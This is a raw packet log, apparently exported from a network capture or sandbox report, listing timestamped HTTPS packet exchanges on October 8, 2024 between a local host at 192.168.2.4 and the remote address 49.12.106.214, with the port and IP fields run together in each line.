                                                                                                                Oct 8, 2024 04:59:53.521243095 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.521280050 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.521313906 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.521325111 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.521369934 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.521370888 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.537720919 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.537760019 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.537798882 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.537810087 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.537837029 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.537851095 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.545766115 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.545804977 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.545836926 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.545847893 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.545869112 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.545886993 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.550702095 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.550739050 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.550772905 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.550782919 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.550807953 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.550827026 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.563226938 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.563266993 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.563304901 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.563316107 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.563342094 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.563355923 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.567601919 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.567640066 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.567672968 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.567682981 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.567708015 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.567725897 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.583954096 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.583995104 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.584026098 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.584037066 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.584060907 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.584098101 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.604666948 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.604707003 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.604738951 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.604749918 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.604777098 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.604794979 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.609029055 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.609067917 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.609096050 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.609107018 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.609129906 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.609147072 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.652343988 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.652381897 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.652415037 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.652432919 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.652461052 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.652494907 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.654912949 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.654954910 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.654988050 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.654999018 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.655023098 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.655041933 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.658277988 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.658328056 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.658356905 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.658366919 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.658390045 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.658406019 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.659987926 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.660028934 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.660057068 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.660068035 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.660090923 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.660106897 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.662956953 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.663019896 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.663038015 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.663064957 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.663091898 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.663150072 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.663161039 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.663203955 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.670618057 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.670651913 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.671430111 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.671494007 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.671590090 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.288240910 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.288279057 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.288321018 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.288331032 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.288368940 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.288388014 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.296260118 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.296319962 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.296341896 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.296360016 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.296391964 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.296418905 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.316150904 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.316220045 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.316247940 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.316258907 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.316299915 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.316329002 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.327336073 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.327378035 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.327420950 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.327431917 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.327481985 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.327502966 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.333148956 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.333221912 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.333233118 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.333285093 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.333302975 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.333359957 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.333767891 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.333802938 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.333825111 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.333863020 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.335817099 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.335907936 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.336011887 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.336534023 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.336580038 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.975985050 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.978718996 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.978974104 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.978981972 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.980271101 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.980276108 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.422346115 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.422370911 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.422389030 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.422499895 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.422533035 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.422554016 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.422590017 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.452879906 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.452908039 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.453002930 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.453064919 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.453224897 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.520584106 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.520611048 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.520816088 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.520910978 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.521076918 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.550379038 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.550399065 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.550508022 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.550569057 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.552098989 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.591689110 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.591706991 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.591933012 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.591998100 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.592076063 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.613574982 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.613593102 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.613795996 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.613859892 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.614134073 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.633440018 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.633469105 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.633634090 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.633634090 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.633699894 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.633761883 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.655725002 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.655745029 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.655854940 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.655917883 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.656083107 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.665709972 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.665733099 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.665878057 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.665946007 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.666006088 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.666007042 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.683284044 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.683300972 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.683442116 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.683522940 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.683681011 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.697551012 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.697568893 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.697674990 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.697755098 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.697834969 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.713491917 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.713510036 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.713609934 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.713625908 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.713793993 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.725759029 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.725780010 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.725872993 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.725893021 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.726051092 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.734755039 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.734775066 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.734828949 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.734843969 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.734879971 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.734901905 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.745393038 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.745410919 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.745487928 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.745503902 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.745563030 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.754417896 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.754441977 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.754488945 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.754503012 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.754537106 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.754574060 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.762947083 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.762964964 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.763024092 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.763037920 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.763071060 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.763091087 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.770843029 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.770863056 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.770931959 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.770940065 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.770979881 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.781183958 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.781208992 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.781258106 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.781270981 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.781300068 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.781330109 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.794720888 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.794739008 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.794971943 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.795033932 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.795104027 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.806407928 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.287655115 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.289875031 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.289886951 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.728450060 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.728465080 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.728477001 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.728768110 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.728833914 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.728919983 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.760267973 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.760283947 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.760543108 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.760543108 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.760606050 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.761171103 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.828696012 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.828710079 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.828943968 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.829006910 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.829087019 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.860528946 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.860539913 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.860841990 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.860903978 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.860975981 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.900249004 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.900260925 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.900342941 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.900404930 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.901036978 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.925735950 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.925766945 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.925937891 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.926000118 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.928637981 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.946190119 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.946233988 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.946480989 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.946480989 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.946544886 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.948875904 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.961390972 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.961404085 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.961565018 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.961579084 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.961637974 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.979540110 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.979556084 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.979649067 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.979661942 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.981163979 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.997651100 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.997665882 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.997735977 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.997756958 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.001270056 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.012466908 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.012485027 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.012599945 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.012599945 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.012617111 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.012751102 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.028676033 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.028687954 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.028757095 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.028769970 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.029090881 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.042006016 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.042017937 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.042112112 CEST49775443192.168.2.449.12.106.214
